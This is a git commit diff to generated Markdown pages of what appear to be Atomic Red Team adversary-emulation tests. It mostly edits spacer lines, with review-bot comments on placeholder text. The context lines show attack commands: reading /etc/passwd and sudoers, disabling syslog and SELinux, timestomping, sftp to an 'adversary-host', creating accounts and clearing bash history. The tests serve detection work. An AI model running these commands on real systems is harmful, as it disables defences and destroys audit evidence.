how about one slash

Brian Beyer
2018-05-10 13:51:37 -06:00
parent 62e9fe559b
commit 31ccf34c84
14 changed files with 32 additions and 32 deletions
+1 -1
@@ -35,5 +35,5 @@ MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.or
```
<%- end -%>
\
\
<%- end -%>
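Review bot: The bare `\` spacer lines between the two `<%- end -%>` tags depend on the Markdown renderer treating a trailing backslash as a hard line break. Under CommonMark that only works inside a paragraph; a backslash that ends a block (directly before a heading or at end of file) is rendered as a literal `\`. Because this ERB template produces the spacer, check the rendered output of one generated page that has several tests, and if a stray backslash shows up, use a blank line or an explicit HTML break for the spacing instead.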
+1 -1
@@ -20,4 +20,4 @@ done
```
\
\
+5 -5
@@ -34,7 +34,7 @@ cat /etc/passwd > #{output_file}
```
\
\
## Atomic Test #2 - View sudoers access
xxx (requires root)
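Review bot: The description under `## Atomic Test #2 - View sudoers access` in the trailing context is still the placeholder `xxx (requires root)`. While this section is being touched, replace it with a one-line statement of what the test reads and why it needs root. The same `xxx` placeholder sits under Atomic Tests #3, #4 and #5 in this file.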
@@ -52,7 +52,7 @@ cat /etc/sudoers > #{output_file}
```
\
\
## Atomic Test #3 - View accounts with UID 0
xxx
@@ -70,7 +70,7 @@ grep 'x:0:' /etc/passwd > #{output_file}
```
\
\
## Atomic Test #4 - List opened files by user
xxx
@@ -83,7 +83,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
\
\
## Atomic Test #5 - Show if a user account has ever logger in remotely
xxx
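Review bot: The heading `## Atomic Test #5 - Show if a user account has ever logger in remotely` in the trailing context has a typo: `logger in` should be `logged in`. Fix it where the heading text originates so the corrected wording survives the next edit of this file, and give the test a real description in place of `xxx`.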
@@ -96,4 +96,4 @@ lastlog > #{output_file}
```
\
\
+4 -4
@@ -35,7 +35,7 @@ fi
```
\
\
## Atomic Test #2 - Disable syslog
Disables syslog collection
@@ -55,7 +55,7 @@ fi
```
\
\
## Atomic Test #3 - Disable Cb Response
Disable the Cb Response service
@@ -75,7 +75,7 @@ fi
```
\
\
## Atomic Test #4 - Disable SELinux
Disables SELinux enforcement
@@ -88,4 +88,4 @@ setenforce 0
```
\
\
+3 -3
@@ -28,7 +28,7 @@ touch -a -t 197001010000.00 #{target_filename}
```
\
\
## Atomic Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file
@@ -46,7 +46,7 @@ touch -m -t 197001010000.00 #{target_filename}
```
\
\
## Atomic Test #3 - Set a file's creation timestamp
Stomps on the create timestamp of a file
@@ -71,4 +71,4 @@ stat #{target_filename}
```
\
\
+1 -1
@@ -49,4 +49,4 @@ sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
```
\
\
+2 -2
@@ -26,7 +26,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
\
\
## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
@@ -39,4 +39,4 @@ powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
\
\
+1 -1
@@ -26,4 +26,4 @@ fi
```
\
\
+2 -2
@@ -26,7 +26,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
\
\
## Atomic Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
@@ -44,4 +44,4 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
\
\
+1 -1
@@ -24,4 +24,4 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
\
\
+6 -6
@@ -32,7 +32,7 @@ rm ~/.bash_history
```
\
\
## Atomic Test #2 - Clear Bash history (echo)
Clears bash history via rm
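Review bot: The description for `## Atomic Test #2 - Clear Bash history (echo)` in the trailing context reads `Clears bash history via rm`, which looks copied from test #1. The next hunk header shows this test's command is `echo "" > ~/.bash_history`, so the description should say the history file is overwritten via echo. An accurate description matters here because people mapping detections to each test rely on it to know which command to look for.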
@@ -45,7 +45,7 @@ echo "" > ~/.bash_history
```
\
\
## Atomic Test #3 - Clear Bash history (cat dev/null)
Clears bash history via cat /dev/null
@@ -58,7 +58,7 @@ cat /dev/null > ~/.bash_history
```
\
\
## Atomic Test #4 - Clear Bash history (ln dev/null)
Clears bash history via a symlink to /dev/null
@@ -71,7 +71,7 @@ ln -sf /dev/null ~/.bash_history
```
\
\
## Atomic Test #5 - Clear Bash history (truncate)
Clears bash history via truncate
@@ -84,7 +84,7 @@ truncate -s0 ~/.bash_history
```
\
\
## Atomic Test #6 - Clear history of a bunch of shells
Clears the history of a bunch of different shell types by setting the history size to zero
@@ -99,4 +99,4 @@ history -c
```
\
\
+1 -1
@@ -23,4 +23,4 @@ ls #{evil_command}
```
\
\
+1 -1
@@ -17,4 +17,4 @@ mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
\
\
+3 -3
@@ -28,7 +28,7 @@ tick 'Developer Mode'.
\
\
## Atomic Test #2 - Chrome (Chrome Web Store)
xxx
@@ -43,7 +43,7 @@ in Chrome
\
\
## Atomic Test #3 - Firefox
Create a file called test.wma, with the duration of 30 seconds
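Review bot: The description under `## Atomic Test #3 - Firefox` in the trailing context is `Create a file called test.wma, with the duration of 30 seconds`, which does not match the steps the next hunk shows for this test (`click "Load Temporary Add-on"`) and looks pasted from an unrelated test. Replace it with a description of loading a temporary add-on in Firefox. The Chrome Web Store test in the previous hunk still carries the `xxx` placeholder as well.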
@@ -59,4 +59,4 @@ click "Load Temporary Add-on"
3. Then click 'Open'
\
\